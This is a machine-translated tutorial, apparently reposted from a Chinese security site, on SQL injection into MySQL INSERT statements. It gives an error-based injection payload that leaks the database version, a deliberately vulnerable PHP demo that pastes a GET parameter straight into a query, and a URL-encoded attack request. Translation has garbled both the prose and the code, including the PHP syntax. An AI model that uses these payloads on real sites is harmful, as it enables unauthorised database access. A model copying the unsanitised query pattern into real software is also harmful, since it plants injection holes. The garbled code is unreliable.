Insert into continue Injection

By Ay shadow
 
Many may ask how to write this stuff again. Have you ever written it before. Xi, although the same principle, but the form is still a bit different, and this method seems to be only suitable for mysql, mssql does not work. As for others, I have never tried it and I am not familiar with it.
First, review the previous insert statement and the current insert statement.
Insert into tbl_name SET column_name = [here]
The injection method is insert into tbl_name SET column_name = [here] xor (SQL statment) or'
This injection mode is very common and highly feasible.
Insert into tbl_name (col1, col2, col3, col4) values (xxx, xxxx, $ _ GET [id], xxx );
This is generally the form, haha.
Mysql supports select subqueries in values, but mssql does not. The following is an example.
1. directly operate in mysql
Insert into test (id, name, textcontents)
Values (1, (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), (SELECT version ())) a from information_schema.tables group by a) B), xxxxxxxx );

 




The information we wanted was successful. Ii. Script demonstration
To prove that my idea is feasible, I wrote a vulnerability script on my own, in apache + php +
It is feasible to test mysql, but it is still a little restricted, that is, the php code should have an error message from mysql output. Mysql_query ($ SQL) or die ("Invalid query :". mysql_error (); generally, there are die () functions, but some websites will not write them. If they are not written, no error injection can be reported.
DEMO code:
================= Php code ============================
<? Php
$ Host = www.2cto.com;
$ Db_name = test;
$ User = root;
 
$ Password = 123456789;

$ SQL = "insert into t (id, name, msg) values (1,". $ _ GET [id]. ", msgmsgmsg )";
Echo "the statement executed this time is". $ SQL. "<br> ";
$ Link = mysql_connect ($ host, $ user, $ password) or die ("couldnt connect! ". Mysql_error ());
Mysql_select_db ($ db_name, $ link) or die ("failed to select database". mysql_error ());
Mysql_query ($ SQL) or die ("Invalid query:". mysql_error ());
// Echo $ SQL;
Echo "<br> database updated ";
Mysql_close ($ link );
?>
=================== Mysql table =================================== Create table t (id int, name char (255), msg char (255 ));
========================================================== =
Result

Demo statement
Inserti. php? Id = test1, (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), (SELECT
Version () a from information_schema.tables group by a) B) % 23

I proved my idea is to pair Didi, Xi